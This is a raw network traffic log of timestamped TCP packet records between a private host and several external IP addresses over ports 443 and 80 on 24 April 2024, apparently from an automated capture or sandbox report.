                                                                                                                                      Apr 24, 2024 12:12:34.757685900 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.757704020 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.757714987 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.757761002 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.758054972 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.758068085 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.758076906 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.758112907 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.759083986 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.759123087 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.759193897 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.759504080 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:34.759521008 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.830854893 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.830925941 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.831023932 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.831140995 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.831191063 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.831249952 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.834755898 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.834793091 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.835077047 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:34.835093021 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.118236065 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.118767023 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:35.118798971 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.119971037 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.120513916 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:35.120610952 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.160572052 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:35.353914976 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.354012966 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.356911898 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.356933117 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.357342005 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.398459911 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.428761959 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.476124048 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.540374041 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.540702105 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.540730000 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.541116953 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.541579962 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.541656971 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.541754007 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.542721033 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.542985916 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.543042898 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.544214010 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.544636011 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.544816971 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.584125042 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.589504957 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:35.941396952 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941428900 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941438913 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941457987 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941505909 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941517115 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.941603899 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941674948 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.941674948 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.941704035 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.941829920 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941895962 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.941910982 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941936970 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.941983938 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.952960014 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.952999115 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:35.953041077 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:35.953056097 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:36.287816048 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:36.287900925 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:36.287957907 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:36.288875103 CEST49716443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:36.288897038 CEST4434971631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:36.531445026 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:36.870893002 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:36.916121960 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.640680075 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.640731096 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.640820980 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.640850067 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.640995026 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.641419888 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.641433954 CEST44349714142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.641443014 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.641546965 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.641565084 CEST49714443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.643122911 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.643161058 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.643268108 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.643510103 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.643527985 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.999213934 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:37.999566078 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:37.999597073 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.000051022 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.000574112 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.000689983 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.000770092 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.048121929 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.051472902 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.355021954 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.355071068 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.355108976 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.355176926 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.355205059 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.355247974 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.355259895 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.355300903 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.356209993 CEST49718443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.356228113 CEST44349718142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.422251940 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.422295094 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.422374010 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.423516035 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.423532963 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.756277084 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.756362915 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.759018898 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.759030104 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.759596109 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.795325041 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:38.840116024 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.868684053 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.868766069 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:38.868858099 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.869057894 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:38.869090080 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.083112001 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.083211899 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.083363056 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.083363056 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.083400011 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.083410978 CEST49719443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.083417892 CEST4434971923.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.121989012 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.122025013 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.122189999 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.122445107 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.122453928 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.224792957 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.225079060 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:39.225121975 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.225435019 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.225868940 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:39.225927114 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.226073980 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:39.268122911 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.274466038 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:39.447969913 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.448049068 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.449388027 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.449399948 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.449707985 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.451070070 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.492110014 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.767488956 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.767638922 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.768528938 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.769685984 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.769685984 CEST49721443192.168.2.1623.3.84.131
                                                                                                                                      Apr 24, 2024 12:12:39.769726038 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.769751072 CEST4434972123.3.84.131192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.855891943 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:39.856050968 CEST44349720142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.856139898 CEST49720443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:40.019368887 CEST4972280192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.019577026 CEST4972380192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.118891001 CEST4972480192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.166920900 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:40.359689951 CEST804972231.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.359814882 CEST4972280192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.360044956 CEST4972280192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.361144066 CEST804972331.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.361216068 CEST4972380192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.460938931 CEST804972431.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.461026907 CEST4972480192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.469459057 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:40.726587057 CEST804972231.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.726651907 CEST804972231.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.726716042 CEST4972280192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.728025913 CEST4972280192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.728494883 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:40.776118994 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.069611073 CEST804972231.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.076466084 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:41.093556881 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.093745947 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.093817949 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:41.094337940 CEST49715443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:41.094374895 CEST4434971531.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.345447063 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:41.413338900 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.413372993 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.413460016 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.413811922 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.413822889 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.774223089 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.774482012 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.774497986 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.775991917 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.776060104 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.776338100 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.776413918 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.776551008 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:41.776559114 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:41.824435949 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.287477016 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:42.664696932 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.664880037 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.665067911 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.665083885 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.665102005 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.665198088 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.665410995 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.665410995 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.665429115 CEST44349725142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.665481091 CEST49725443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.666598082 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.666719913 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:42.666809082 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.667015076 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:42.667049885 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:43.024589062 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:43.024915934 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:43.024974108 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:43.025309086 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:43.025712013 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:43.025787115 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:43.071448088 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:44.636670113 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:44.700525045 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:44.940483093 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:45.548552036 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:45.919852018 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.919931889 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:45.920031071 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.920377016 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.920408010 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:45.920917034 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.920957088 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:45.921020985 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.921271086 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:45.921286106 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.625941038 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.626297951 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.626327038 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.626791954 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.627311945 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.627383947 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.627446890 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.634452105 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.634759903 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.634829044 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.635176897 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.635586977 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.635651112 CEST4434972731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.672113895 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:46.672489882 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.688492060 CEST49727443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:46.751492023 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:47.370521069 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:47.370711088 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:47.370779991 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:47.371592045 CEST49728443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:47.371613979 CEST4434972831.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:49.162496090 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:49.514478922 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:50.954503059 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:53.034909964 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:53.034998894 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:53.035069942 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:53.977467060 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:54.811281919 CEST49726443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:54.811350107 CEST44349726142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.056065083 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.056114912 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.056186914 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.056483030 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.056498051 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.117501020 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      Apr 24, 2024 12:12:59.412341118 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.412684917 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.412703037 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.413151026 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.413467884 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.413548946 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.413588047 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:59.460120916 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:59.468502998 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:13:00.207197905 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:00.207283020 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:00.207370043 CEST44349729142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:00.207370996 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:13:00.207532883 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:13:00.208149910 CEST49729443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:13:00.208173037 CEST44349729142.250.141.106192.168.2.16
